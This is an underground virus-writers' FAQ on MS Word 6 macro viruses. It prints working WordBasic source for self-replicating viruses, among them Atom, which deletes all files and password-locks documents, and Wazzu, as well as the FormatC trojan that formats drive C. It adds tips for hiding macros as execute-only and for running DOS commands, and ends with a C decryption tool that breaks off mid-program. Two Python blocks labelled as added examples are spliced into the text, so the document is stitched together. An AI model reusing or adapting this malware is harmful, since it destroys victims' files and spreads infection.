--------------------------------------------------------------
The UNDERGROUND MS WORD 6.x MACRO VIRUSES FAQ V1.0
By AuRoDrEpH, the Drow      <****{=============- '
--------------------------------------------------------------
"Help to MICROFUCK WORD."
--------------------------------------------------------------

--------------------------------------------------------------
TOPIC 1 : WHAT IS A WORD MACRO VIRUS?
=========================================

A WORD MACRO virus is a macro or template file which masquerades as a legitimate MS WORD document. An infected *.DOC file doesn't look any different to the average PC user, as it can still contain a normal document. The difference is that this document is really just a template or macro file, with instructions to replicate, and possibly cause damage. MS WORD will interpret the *.DOT macro/template file, regardless of extension, as a template file. This allows it to be passed off as a legitimate document <*.DOC>.

This FAQ takes the position that a document is meant to be DATA, and a MACRO is at least partially executable CODE. When a document has been infected, it has been merged with executable code in a multi-part file, part data/part executable. This tends to be hidden from the user, who expects a document to be data that is READ, and not some combination of DATA and executable code designed to be executed, often against the will of the user, to wreak havoc.

These viruses commonly infect the global macros, which get automatically saved at the end of each session. When the next session of MS WORD opens, the infected global macros are executed, the WORD environment is now infected, and it will in turn be likely to infect documents whenever they are opened, closed, and created during all future sessions.

As viruses, the WORD MACRO VIRUSES do REPLICATE.
They can spread in most cases to any MS WINDOWS environment or OS that runs a compatible copy of MS WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0 for MacOS. This makes it a multi-platform/multi-OS file infector. It also makes it one of the first non-research viruses to be successfully spread to all of these environments and OS's.

MS Word macro viruses reside in interpreted data that can spread to different OS's/platforms. These viruses do not spread via modification of executable machine code, but by modification of data in files that are interpreted by the Microsoft Word 6.0 program and any other versions of Word that support macros and WordBasic.

The WordBasic macro language is much simpler to learn and master than ASSEMBLER or other popular higher-level programming languages, and for this reason Vx people have taken to it as a viable alternative to learning and coding ASM. The thought of ticking users off on more than one platform has been around for years, and now, thanks to MS WORD and all its compatible versions on other popular platforms, the Vx people have their wish.

Another bonus of this new outlet for Vx writers is that many virus scanners only scan executable files, leaving the .DOC files of WORD alone. It is important to note that many AV producers have now added scanners/cleaners to their software, allowing for the detection of existing MS WORD macro viruses.

--------------------------------------------------------------
TOPIC 2: HOW TO STUDY AN INFECTED DOCUMENT
=======================================

You are happy :-) You have found the latest macro virus. And now you want to study it, find the source code and modify it. OK, I'll explain... it's very easy.

First of all, make a copy of the NORMAL.DOT file (it's in MSOFFICE\WINWORD\MODELES). In most cases the macro virus isn't dangerous, except for the trojan FORMATC. In fact, when you read the document, it formats C:.
So a good idea is to run a TSR anti-virus like VIRSTOP. Now launch the WORD application, and ...(it's the time to execute)... then go to the menu TOOLS/OPTIONS and, in the SAVE tab, select the option "Prompt to save NORMAL.DOT". Then take a look at the file with a hex editor. A Word document is composed of a first part, the data (text), then the macros, and in the last part the data (name of the file, ...). OK. Find the name of the document near the end... and look for a "U". If you see some U's, this means that the macros are encrypted. You will need more time to study it, because when you copy a macro, WORD gives you the option EXECUTE-ONLY: you can execute the macro, but you can't see the source...

If you take a look near the name, you can see the names of all the macros included in the file. The names can give you an idea of what they do... but be careful!!

Now open the infected document and see what it does. Nothing... It's normal!! Go to the menu TOOLS/MACRO. You can see the names of the macros (the same ones you saw with the hex editor). IF you can use the Modify button, the macro is execute-only... THEN go to TOPIC 4. Else read the script and keep what you want...

--------------------------------------------------------------
TOPIC 3: VIRUS EXAMPLES and what you can keep in mind
======================================================

I have studied some macro viruses for you and I've commented them...

--------------------------------------------------------------
4.1: Concept Virus :
====================

Also known by the aliases WW6Macro, WinWord.Concept, Word Basic Macro Virus (WBMV), Word Macro 9508 and Prank Macro. This was the first MS macro virus to be detected by the anti-virus community, and the first macro virus to be considered in the wild, with infections spreading to the US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, Finland, and other countries.
A CONCEPT infection is easy to notice: on the first execution of the virus-infected document (on the first opening of the infected file) a MessageBox appears with the digit "1" inside and an "OK" button. Also, simply checking the TOOLS/MACROS option to check loaded macros, the presence of Concept is apparent by the appearance of these 5 macros:

    AAAZFS *
    AAAZAO *
    AutoOpen
    PayLoad *
    FileSaveAs

The infection routine of this virus:

    'see if we're already installed
    For i = 1 To iMacroCount
        If MacroName$(i, 0, 0) = "PayLoad" Then
            bInstalled = - 1
        End If
        If MacroName$(i, 0, 0) = "FileSaveAs" Then
            bTooMuchTrouble = - 1
        End If
    Next i
    If Not bInstalled And Not bTooMuchTrouble Then
        'add FileSaveAs and copies of AutoOpen and FileSaveAs.
        'PayLoad is just for fun.
        iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
        sMe$ = FileName$()
        sMacro$ = sMe$ + ":Payload"
        MacroCopy sMacro$, "Global:PayLoad"
        sMacro$ = sMe$ + ":AAAZFS"
        MacroCopy sMacro$, "Global:FileSaveAs"
        sMacro$ = sMe$ + ":AAAZFS"
        MacroCopy sMacro$, "Global:AAAZFS"
        sMacro$ = sMe$ + ":AAAZAO"
        MacroCopy sMacro$, "Global:AAAZAO"

At the end of each MacroCopy, you put ",1" and you have execute-only macros... just an idea :)

--------------------------------------------------------------
4.2: Nuclear :
==============

Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert. This virus was the first WordMacro virus to infect both data/documents as well as executables <.COM/.EXE/NEWEXE>. In truth, it is 2 viruses: a macro virus which alters the operating environment of WORD, and an executable file infector. This makes NUCLEAR the first macro virus to also incorporate, or at least try to incorporate, a classic file infector virus. This virus is actually quite ineffective in the destructive sense, as detailed later in this document. The infected documents contain the following nine macros...
    AutoExec
    AutoOpen
    FileSaveAs
    FilePrint
    FilePrintDefault
    InsertPayload *
    Payload *
    DropSuriv *
    FileExit

which get copied into the GLOBAL macro list. General detection of NUCLEAR is easy: simply view the macros listed under the Macros command in the Tools menu. If the macros "InsertPayload", "Payload", and "DropSuriv" are listed, then you likely have a NUCLEAR infection.

NUCLEAR hides itself from detection by disabling the "PROMPT FOR CHANGES TO NORMAL.DOT" option. Changes are made, and the user doesn't notice anything.

The "InsertPayload" macro will cause the following text to be added to the end of printouts when printing documents. Every 12th printout will have the following text added...

    And finally I would like to say:
    STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!

which is appended to the file after the command to print is issued but prior to the actual printing. Faxes sent via a fax print driver will also be affected; this much I know first hand. From testing, I came to the realization that some Vx putz will start messing with my outgoing faxes behind our backs.

Another included macro is "Payload", which tries to delete IO.SYS, MSDOS.SYS and COMMAND.COM on April 5th. It is ineffective, as WordBasic can't reset the attributes of a file which has the System attribute set. It has been noted that a variant that does work is being circulated.

The second part of the Nuclear virus is the executable infector. The DropSuriv macro checks the system time, and will attempt to drop the file infector between 17:00 and 18:00. However, the routine is flawed, and shouldn't work on any system. If DropSuriv DID work properly, it would search for the standard DOS utility DEBUG.EXE; if found, the macro drops PH33r.SCR & EXEC_PH.BAT. The BAT file is executed, and then the hex dump file PH33r.SCR is converted from a DEBUG script into an executable, which is in turn executed. Later, the .SCR and .BAT files are deleted to cover its tracks.
The file infector then hooks INT 21h and writes itself at the end of COM/EXE/NewEXE files. Unconfirmed reports state that a NUCLEAR-infected macro with a fully operational DropSuriv macro exists. The following text strings are in the executable infector...

    =Ph33r=
    Qark/VLAD

The virus group VLAD published it in issue n4. (I think the entire version of this virus... So, find them on the Net.)

--------------------------------------------------------------
4.3: Colors:
=============

Colors is the first WINWORD macro virus that could be called cute. This virus has the noticeable ability to alter the Windows colors settings.

    If iModEvery = (iEvery - 1) Then
        sColors$(0) = "Background"
        sColors$(1) = "AppWorkspace"
        ...
        sColors$(19) = "InactiveTitleText"
        sColors$(20) = "ButtonHilight"
        For i = 0 To 20
            SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)))
        Next i
    End If

Mac Word is immune to the payload but is still susceptible to the infection mechanism, which will attack documents. Detection of infections is easy, as infected documents appear with the template icon rather than the usual document icon.

Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted to usenet newsgroups on October 14th, 1995. The Colors virus will infect the global template upon opening of an infected document. An infected document contains the following macros:

    AutoOpen
    AutoClose
    AutoExec
    FileNew
    FileExit
    FileSave
    FileSaveAs
    ToolsMacro

and other macros. All macros included in COLORS are execute-only, and cannot be viewed or edited by Microsoft Word. If normal "clean" macros with the same names existed prior to infection, they will be overwritten by COLORS. The AutoExec macro of COLORS is an EMPTY macro, possibly designed to defeat any ANTI-MACRO-VIRUS schemes developed by the AV community.
It accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec macro with COLORS' empty one, effectively making the AV scanner/cleaner useless. COLORS will also enable AutoMacros in case you were smart and disabled them! It will also disable MS Word's prompt to save changes to NORMAL.DOT.

    [ OutilsOptionsEnregistrement .InviteGlobalDot = 0 ]   Very interesting

COLORS is crafty, as it can spread without the use of AUTO macros... thus defeating the DISABLE AUTOMACROS feature. It does so via the macros:

    File/New
    File/Save
    File/SaveAs
    File/Exit
    Tools/Macro

COLORS will infect NORMAL.DOT whenever a user chooses any of the above functions. It also has limited stealth ability, earning it the title of the first WINWORD STEALTH MACRO VIRUS. It accomplishes its stealth actions by hiding itself from the active listing, since attempting to view active macros would run the COLORS-infected Tools/Macro, thus hiding its own presence while simultaneously infecting your system.

    [ MacroTools .Name = sNames$(i), .Print = 1, .Delete ]   Good !!!

The COLORS virus will keep track of infections via a counter named "countersu", which can be found under the [Windows] section of the WIN.INI file. Whenever an infected macro is executed, the counter is incremented by one. It quickly adds up, when you consider how often you OPEN, CREATE, SAVE, EXIT, and CLOSE documents. When the counter reaches 299, and every 300th execution thereafter, COLORS will be triggered. COLORS will then make changes to the system colors setup, including text, background, borders, buttons, etc., using randomly determined colors. The new color scheme becomes apparent to the user during the next session of Windows.

Colors' ability to spread without the use of AutoExecute macros, and its use of advanced stealth techniques, signals a new level of macro virus technology. It also adds fuel to the VxD argument, as an on-access scanner could prevent infection by this type of stealthy virus.
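As an added example (not from the FAQ), the detection hints given above for Concept, Nuclear and Colors turned into a check over a Tools/Macro listing and a WIN.INI fragment: the macro-name sets and the "countersu" counter are the indicators the FAQ names; the sample listing and INI text are constructed for the demonstration.

```python
"""Indicator check for the Concept, Nuclear and Colors families described above.

Added example, not part of the FAQ: the macro names and the WIN.INI counter
are the indicators the FAQ gives; the sample macro listing and WIN.INI text
below are constructed for the demonstration.
"""

# Macro sets the FAQ lists for each family (compared case-insensitively,
# since Word does not distinguish macro-name case).
FAMILIES = {
    "Concept": {"aaazfs", "aaazao", "payload"},
    "Nuclear": {"insertpayload", "payload", "dropsuriv"},
    "Colors": {"autoopen", "autoclose", "autoexec", "filenew",
               "fileexit", "filesave", "filesaveas", "toolsmacro"},
}

COLORS_PERIOD = 300  # Colors triggers at counter 299 and every 300th run after


def parse_ini(text):
    """Tiny INI reader: {section: {key: value}}, sections and keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def matching_families(macro_names):
    """Families whose complete FAQ macro set appears in the Tools/Macro listing."""
    present = {name.strip().lower() for name in macro_names}
    return sorted(f for f, needed in FAMILIES.items() if needed <= present)


def colors_counter(win_ini_text):
    """The Colors 'countersu' value from [Windows] in WIN.INI, or None if absent."""
    value = parse_ini(win_ini_text).get("windows", {}).get("countersu")
    if value is None:
        return None
    try:
        return int(value)
    except ValueError:
        return None


def colors_runs_until_trigger(counter):
    """Infected-macro executions left before the next colour-scrambling payload."""
    return (COLORS_PERIOD - 1 - counter) % COLORS_PERIOD


def assess(macro_names, win_ini_text):
    """Combine both indicators into one verdict dictionary."""
    verdict = {"families": matching_families(macro_names)}
    counter = colors_counter(win_ini_text)
    if counter is not None:  # the counter only exists on a Colors-infected system
        verdict["families"] = sorted(set(verdict["families"]) | {"Colors"})
        verdict["colors_counter"] = counter
        verdict["colors_runs_until_trigger"] = colors_runs_until_trigger(counter)
    return verdict


# Constructed sample input: a Tools/Macro listing and a WIN.INI fragment.
SAMPLE_MACROS = ["AutoExec", "AutoOpen", "FileSaveAs", "FilePrint", "FilePrintDefault",
                 "InsertPayload", "Payload", "DropSuriv", "FileExit"]
SAMPLE_WIN_INI = """[Windows]
load=
run=
countersu=295
[Desktop]
Wallpaper=(None)
"""

if __name__ == "__main__":
    print(assess(SAMPLE_MACROS, SAMPLE_WIN_INI))
```

Macro names alone cannot distinguish a single-macro trojan such as FORMATC from a clean document, so this check only covers the three families whose macro sets the FAQ lists.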
You have the complete disassembly in the previous issue.. so download it...

--------------------------------------------------------------
4.4: DMV:
=========

Commonly known as WordMacro.DMV, DMV is an unremarkable TEST virus, possibly the first to be created using the WordBasic language. Joel McNamara wrote it in the fall of 1994, as a real-time TEST for some macro virus theories. The virus was kept under wraps, and a detailed paper was published. This TEST virus was only released, as an educational aid, after the CONCEPT virus was discovered. DMV isn't a threat to anyone, as it announces itself upon infecting the system. Nothing to say, it's an old virus, and now all the techniques it used are detected by most AVX.

--------------------------------------------------------------
4.5: HOT:
=========

Also known as WORDMACRO HOT, WinWord.Hot. Not the most ingenious of the macro virus family, its biggest kick is the ability to wait or sleep for a while and then delete a file. WordMacro/Hot appears to be the first Word macro virus written in Russia. It was found in the wild in Russia in January 1996. Infected documents contain four execute-only macros:

    AutoOpen
    DrawBringInFrOut
    InsertPBreak
    ToolsRepaginat

Macintosh Word users will notice HOT by examining the icon of the file... infected documents appear with the template icon, normal documents appear with the normal document icon.

NOTE: WordMacro/Hot appears to be the first macro virus to use external functions, allowing Word macros to call any standard Windows API call. This makes the spreading function Windows 3.x specific, preventing Word for MAC and Word 7 for Win '95 from spreading the virus. An error dialog will be displayed under Microsoft Word 7.0:

    Unable to load specified library

HOT activates automatically via its AutoOpen macro, adding a line LIKE...

    QLHot=34512

to MS Word for Windows 6's WinWord6.INI file, which acts as a counter recorder system, setting a date 14 days in the future for payload activation.
HOT then copies the included macros to the global template, NORMAL.DOT usually, revising their names...

    AutoOpen          ==> StartOfDoc
    DrawBringInFrOut  ==> AutoOpen
    InsertPBreak      ==> InsertPageBreak
    ToolsRepaginat    ==> FileSave

A listing of the currently loaded macros in this infected environment will reveal the names in the right list. Loading another infected document will add the left list to the macro list plus the right list.

NOTE: Macros have been saved with the 'execute-only' feature, which means that a user can't view or edit them. A clean WORD environment will produce the left list when viewing an infected document.

HOT's FileSave macro causes the virus to randomly decide, within 1-6 days from the infection date, to activate whenever an effort to open files is made. Upon activation, a document will have its contents deleted, by opening it, selecting the entire contents, deleting them, and closing the document, saving it in its now empty state. Users with C:\DOS\EGA5.CPI should be protected from this macro, as the author included a check for this file as a protective measure, noted in the source code as follows:

    '---------------------------------------------------------------
    '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
    '- and if File C:DOSega5.cpi not exist (not for OUR friends) ---
    '---------------------------------------------------------------

HOT's InsertPBreak macro inserts a page break in current documents, which is used as a sign of a document already being infected by HOT.

NOTE: WordMacro/Hot relies on the existence of KERNEL.EXE.

I can see this macro; if you have it, please send it to the mag.... thanks

--------------------------------------------------------------
4.6: MS WORD 2/MS WORD 6.x MACRO TROJAN WEIDEROFFEN:
====================================================

This is a new macro trojan that goes by the alias WinWord.Weideroffnen. It is technically a WinWord 2 infected document, which works equally well under MS WORD 6.x.
It intercepts AutoClose, and attempts to play tricks with the boot-up file AUTOEXEC.BAT. I haven't seen this macro virus, so I don't know...

--------------------------------------------------------------
4.7 WORDMACRO ATOM / ATOMIC
=============================

This is a new macro virus, found in February 1996, which works along the same general ideas as the original Concept virus. The WordMacro/Atom virus is not known to be in the wild. The differences, when compared to the Concept virus, follow:

- All the macros in this virus have been marked EXECUTE ONLY, making them encrypted
- Replication occurs both during file openings and file saves.
- Atom comes with 2 destructive payloads

On December 13th, its first point of activation occurs. It will attempt to delete all files in the current file directory. The second activation password-protects documents, restricting the users' access to their own documents. This happens when the system clock seconds counter equals 13 and a File/Save As command is issued. The password assigned to the documents is ATOM#1.

If the user disables AUTOMACROS, Atom will be unable to execute and spread to other documents. Enabling the Prompt To Save NORMAL.DOT will prevent Atom from attacking and infecting the NORMAL.DOT file.

Here is the source. Keep in mind the idea of putting a password in a file, not a bad idea....
    Macros: Atom

    Sub MAIN
        On Error Goto KillError
        If Day(Now()) = 13 And Month(Now() = 12) Then
            Kill "*.*"
        End If
    KillError:
    End Sub

    Macros: AutoOpen

    Sub MAIN
        Dim FN$
        FN$ = FileName$()
        On Error Goto ErrorInfectGlobalTemplate
        If (CheckInfected = 0) Then
            MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
            MacroCopy FN$ + ":FileOpen", "FileOpen", 1
            MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
            MacroCopy FN$ + ":Atom", "Atom", 1
            SaveTemplate
        End If
        Call Atom
    ErrorInfectGlobalTemplate:
    End Sub

    Function CheckInfected
        CheckInfected = 0
        If (CountMacros(0) >= 4) Then
            For I = 1 To CountMacros(0)
                If (MacroName$(I, 0) = "Atom") Then
                    CheckInfected = 1
                End If
            Next I
        End If
    End Function

    Macros: FileOpen

    Sub MAIN
        On Error Goto InfError
        Dim dlg As FileOpen
        GetCurValues dlg
        Dialog dlg
        FileOpen dlg
        MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
        MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
        MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
        MacroCopy "Atom", Dlg.Name + ":Atom", 1
        FileSaveAs .Format = 1
    InfError:
    End Sub

    Macros: FileSaveAs

    Sub MAIN
        Dim dlg As FileSaveAs
        GetCurValues dlg
        Dialog dlg
        If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
            MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
            MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
            MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
            MacroCopy "Atom", WindowName$() + ":Atom", 1
            Dlg.Format = 1
        End If
        If (Second(Now()) = 13) Then      ' easy... to block a document
            Dlg.Password = "ATOM#1"       ' an idea: why not put a randomized passwd?
        End If
        FileSaveAs dlg
    End Sub

--------------------------------------------------------------
4.9 FORMATC MACRO TROJAN
==========================

Also known as WORDMACRO.FORMATC and FORMAT.C.Macro.Trojan. The FORMATC macro virus isn't even a virus, as it DOES NOT SPREAD. This makes it another MACRO TROJAN. This trojan contains only one macro, AutoOpen, which will be executed automatically when a document is opened. The macro AutoOpen is execute-only, making it encrypted, and neither readable nor editable.
It is visible in the macro list. When FORMATC is executed, "triggered", it will run a DOS session in a minimized DOS box. It will run an unconditional format of the C drive. Here is the macro: basic but deadly...

    Sub MAIN
        sCmd$ = "echo y|format c: /u"
        Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
    End Sub

If you want to execute DOS commands, you have here a hint on how to do it.

--------------------------------------------------------------
4.10 WORDMACRO WAZZU
=======================

WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language independent, i.e. this macro virus is able to infect localized versions of Word as well as the English Word. It inserts the word "Wazzu" in your text ... why not.... Nothing more to say, classic...

    Sub MAIN
        On Error Goto errCaught
        FileSummaryInfo .Update
        Dim dlg As FileSummaryInfo
        GetCurValues dlg
        fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
        globMacro$ = "Global:autoOpen"
        MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))
        If MacroFile$ = "NORMAL.DOT" Then
            MacroCopy globMacro$, fileMacro$
            FileSaveAs .Format = 1
        Else
            MacroCopy fileMacro$, globMacro$
        End If
        Payload
        Goto bye
    errCaught:
    bye:
        On Error Goto 0
    End Sub

    Sub Payload
        For i = 1 To 3
            If Rnd() < 0.2 Then
                RndWord
                SelectCurWord
                selWord$ = Selection$()
                DeleteWord
                RndWord
                Insert selWord$ + " "
            End If
        Next
        If Rnd() < 0.25 Then
            RndWord
            Insert "wazzu "          ' <------------------- here's the payload
            StartOfDocument
        End If
    End Sub

    Sub RndWord
        FileSummaryInfo .Update
        Dim dlg As DocumentStatistics
        GetCurValues dlg
        wordNum = Int(Rnd() * Val(dlg.Words))
        StartOfDocument
        WordRight wordNum
    End Sub

--------------------------------------------------------------
TOPIC 5: HOW TO DO WITH EXECUTE-ONLY MACROS
============================================

Easy: when you copy a macro with the option 1, Microsoft Word encrypts the source of the macro, so when you look at the file, you can't see it.... But the encryption they use is stupid :))) an XOR value... so the only difficult thing is to find the XOR key... you must scan the file, and the XOR value is included...
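As an added example (not the FAQ's own tool), the key-finding and XOR-decoding method of this topic written out in Python so an analyst can step through it on a file of known layout: the 'U' key record after the file name, the A5 C6 41 marker before the macro body, and the decoded 64 1A 1B end sequence the FAQ's C tool stops on. The document bytes are constructed here; a real Word file carries more structure than this sketch.

```python
"""Find the XOR key and decode execute-only macros, following the layout the
FAQ describes. Added example, not the FAQ's own C tool; the document bytes
below are constructed for the demonstration, not taken from a real file."""

MARKER = bytes([0xA5, 0xC6, 0x41])   # precedes <byte> <key> and the macro body
END_SEQ = bytes([0x64, 0x1A, 0x1B])  # decoded bytes ending a macro (next byte != 0x64)
RECORD_STEP = 24                     # distance from one 'U' key record to the next


def find_macro_keys(doc, filename):
    """One key per macro: the byte after each 'U' (0x55) record after the file name."""
    name = filename.upper().encode("ascii")   # the name is stored in upper case
    pos = doc.find(name)
    if pos < 0:
        raise ValueError("file name not found in document")
    pos = doc.find(b"U", pos + len(name))
    keys = []
    while 0 <= pos < len(doc) - 1 and doc[pos] == 0x55:
        keys.append(doc[pos + 1])
        pos += RECORD_STEP
    return keys


def find_macro_start(doc, key):
    """Offset of the first body byte: just after A5 C6 41 whose +4 byte is the key."""
    i = doc.find(MARKER)
    while i >= 0 and i + 4 < len(doc):
        if doc[i + 4] == key:
            return i + 3
        i = doc.find(MARKER, i + 1)
    return -1


def decrypt_macro(doc, key, start):
    """XOR from start until the decoded END_SEQ; returns (plaintext, offset after it)."""
    out = bytearray()
    i = start
    while i < len(doc):
        out.append(doc[i] ^ key)
        i += 1
        if out.endswith(END_SEQ):
            following = (doc[i] ^ key) if i < len(doc) else None
            if following != 0x64:
                break
    return bytes(out), i


def decrypt_all(doc, filename):
    """Decode every execute-only macro; macro n+1 starts right after macro n's END_SEQ."""
    keys = find_macro_keys(doc, filename)
    if not keys:
        raise ValueError("no 'U' key record found after the file name")
    start = find_macro_start(doc, keys[0])
    if start < 0:
        raise ValueError("macro start marker not found")
    macros = []
    for key in keys:
        body, start = decrypt_macro(doc, key, start)
        macros.append(body)
    return macros


def macro_plaintext(source):
    """Constructed body layout: a lead byte, a zero (so the raw byte at marker+4
    equals the key, which the marker check relies on), the source, then END_SEQ."""
    return b"\x01\x00" + source.encode("ascii") + END_SEQ


def build_sample(filename, sources, keys):
    """Constructed document: text area, file name, 'U' key records, marker, XOR'd bodies."""
    doc = bytearray(b"Some document text.\x00\x00")
    doc += filename.upper().encode("ascii") + b"\x00\x00"
    for key in keys:
        record = bytearray(RECORD_STEP)
        record[0], record[1] = 0x55, key
        doc += record
    doc += b"\x00" * 8 + MARKER
    for source, key in zip(sources, keys):
        doc += bytes(b ^ key for b in macro_plaintext(source))
    return bytes(doc)


SAMPLE_SOURCES = ["Sub MAIN\r\nMsgBox \"1\"\r\nEnd Sub\r\n",
                  "Sub MAIN\r\nFileSaveAs .Format = 1\r\nEnd Sub\r\n"]
SAMPLE_KEYS = [0x3C, 0x5A]
SAMPLE_DOC = build_sample("INFECTED.DOC", SAMPLE_SOURCES, SAMPLE_KEYS)

if __name__ == "__main__":
    for n, body in enumerate(decrypt_all(SAMPLE_DOC, "INFECTED.DOC"), 1):
        print("macro", n, "key", hex(SAMPLE_KEYS[n - 1]), repr(body[2:-3].decode("ascii")))
```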
I explain the method: locate the "real" filename of the document within the document. A few bytes after the end of the name there is a "U"; the byte immediately following is the ... XOR value to use. Now find the beginning of the macros; they are usually at B89h or at 1509h. To locate them, there is always the sequence A5h C6h 41h, then a byte, and then the XOR value.... This is the standard method; you must know that each macro has a specific XOR value.. when you look for the filename, you will find as many U's as you have macros in the document.

I encountered some difficulties when the document is composed of encrypted macros and normal macros... In this case, try to delete some macros and decrypt...

I can give you a little C source to help you. This source uses a brutal method, so you will have 1 macro readable per file.... try it with the COLORS macro (last issue). I know that the software functions well.

- --><-cut here---------------------------------
/********* (c) AURODREPH Productions 04/1996 **********/
#include "io.h"
#include "stdlib.h"
#include "stdio.h"
#include "conio.h"
#include "process.h"
#include "fcntl.h"
#include "string.h"
#include "sys\stat.h"

void main (void)
{
    char Name[13];
    char Target[13];
    unsigned char *Buffer;
    int Handler, Handler1;
    unsigned int Offset;
    unsigned long Length = 0;
    int point, max, trouve, cledec, debmac, decfin;
    int stop, nbr, positcle, nbrmac, i;

    clrscr();
    printf (" ******************************************************************\n");
    printf (" *                                                                *\n");
    printf (" *            DECRYPT WORD 6.0 MACROS saved                       *\n");
    printf (" *            with the option Execute-only                        *\n");
    printf (" *                                                                *\n");
    printf (" *                                                                *\n");
    printf (" * --- ,This file works only with files < 32 Ko. ----             *\n");
    printf (" *     <*****}===============-                                    *\n");
    printf (" *     (z) ' AURODREPH Productions 04/1996                        *\n");
    printf (" *     ver 0.666B                                                 *\n");
    printf (" ******************************************************************\n");
    printf ("\n");
    printf ("\n");
    printf ("Name of the input file = ");
    scanf ("%12s", Name);
    printf ("\n");
    printf ("Name of the output file = ");
    scanf ("%12s", Target);
    printf ("\n");
    printf ("Number of crypted macros = ");
    scanf ("%d", &nbrmac);
    printf ("\n");
    if (nbrmac > 50) { exit (0); }

    Handler = open (Name, O_BINARY | O_RDONLY, S_IREAD);
    if (Handler == -1) { printf ("The input file doesn't exist.\n"); exit (0); }
    Length = (unsigned long) lseek (Handler, 0, SEEK_END);
    lseek (Handler, 0, SEEK_SET);
    Buffer = (unsigned char *) malloc ((unsigned) Length);
    if (Buffer == NULL) printf ("Fail memory allocation.\n");
    if (read (Handler, Buffer, (unsigned) Length) != Length)
    {
        printf ("The size of the file is > 32 ko)\n");
        printf ("Try to remove some macros with WORD....\n");
        exit (0);
    }

    point = 0;
    max = strlen (Name);
    trouve = 1;
    cledec = 0x00;
    debmac = 0x00;
    stop = 0;

    /* the file name is stored in upper case: convert the one typed in */
    for (i = 0; i < max; i++)
    {
        if ((Name[i] >= 0x61) & (Name[i] <= 0x7A)) { Name[i] = Name[i] & 0xDF; }
    };

    /* look for the file name, then for the 'U' that precedes the XOR key */
    for (Offset = 0x0000; Offset < Length; Offset++)
    {
        if ((Buffer[Offset] == Name[point]) && (stop != 1))
        {
            for (point = 1; point <= (max - 1); point++)
            {
                if (Buffer[Offset + point] == Name[point]) { trouve = trouve + 1; }
                else trouve = 1;
            };
        }
        if (trouve == max) { stop = 1; }
        if ((trouve == max) && (Buffer[Offset] == 0x55))
        {
            cledec = Buffer[Offset + 1];
            trouve = 0;
            Buffer[Offset + 1] = 0x00;
            positcle = Offset;
        }
        point = 0;
    };

    if (cledec == 0x00)
    {
        printf (" Don't find the decrypted key... \n");
        exit (0);
    }
    else printf ("Decrypted Key for the macro n 1 = %x \n", cledec);

    /* the macro body follows the sequence A5 C6 41 <byte> <key> */
    for (Offset = 0x0000; Offset < Length; Offset++)
    {
        if (Buffer[Offset] == 0xA5)
        {
            if ((Buffer[Offset + 1] == 0xC6) || (Buffer[Offset + 1] == 0xC4))
            {
                if (Buffer[Offset + 2] == 0x41)
                {
                    if (Buffer[Offset + 4] == cledec) { debmac = Offset + 3; }
                }
            }
        }
    };
    /* fallback: look for the byte pair (key - 1, key) */
    if (debmac == 0x00)
    {
        for (Offset = 0x0000; Offset < Length; Offset++)
        {
            if (Buffer[Offset] == cledec - 1)
            {
                if (Buffer[Offset + 1] == cledec) { debmac = Offset; }
            }
        };
    }
    if (debmac == 0x00) { printf (" Don't find the beginning of the macro\n"); exit (0); }

    for (nbr = 1; nbr <= nbrmac; nbr++)
    {
        if (nbr != 1)
        {
            printf ("\n");
            printf (" I decrypt the macro n %d \n", nbr);
            Offset = positcle + 24;          /* the next macro's 'U' record */
            if (Buffer[Offset] == 0x55)
            {
                cledec = Buffer[Offset + 1];
                Buffer[Offset + 1] = 0x00;
                positcle = Offset;
                printf ("Decrypted Key for the macro n %d = %x \n", nbr, cledec);
            }
            else { printf (" Don't find the decrypted key ....\n"); }
        }
        Offset = debmac;
        point = 0;
        decfin = 1;
        stop = 1;
        printf (" I work ");
        do
        {
            if (stop == 400) { printf ("."); stop = 1; }
            Buffer[Offset + point] ^= cledec;          /* XOR decryption */
            /* a macro ends at the decrypted sequence 64 1A 1B not followed by 64 */
            if (Buffer[Offset + point] == 0x64)
            {
                Buffer[Offset + point + 1] ^= cledec;
                if (Buffer[Offset + point + 1] == 0x1a)
                {
                    Buffer[Offset + point + 2] ^= cledec;
                    if (Buffer[Offset + point + 2] == 0x1b)
                    {
                        Buffer[Offset + point + 3] ^= cledec;
                        if (Buffer[Offset + point + 3] != 0x64)
                        {
                            decfin = 0;
                            debmac = Offset + point + 3;
                            Buffer[Offset + point + 3] ^= cledec;
                        }
                        else Buffer[Offset + point + 3] ^= cledec;
                    }
                    else Buffer[Offset + point + 2] ^= cledec;
                }
                else Buffer[Offset + point + 1] ^= cledec;
            }
            if ((Offset + point) == Length) { decfin = 0; }
            stop = stop + 1;
            point = point + 1;
        } while (decfin != 0);
        printf ("\n");
        printf (" End of decrypting the macro n %d \n", nbr);
    };

    _fmode = O_BINARY;
    Handler1 = creat (Target, S_IFMT | S_IREAD | S_IWRITE);
    write (Handler1, Buffer, (unsigned) Length);
    close (Handler1);
    close (Handler);
    printf ("\n");
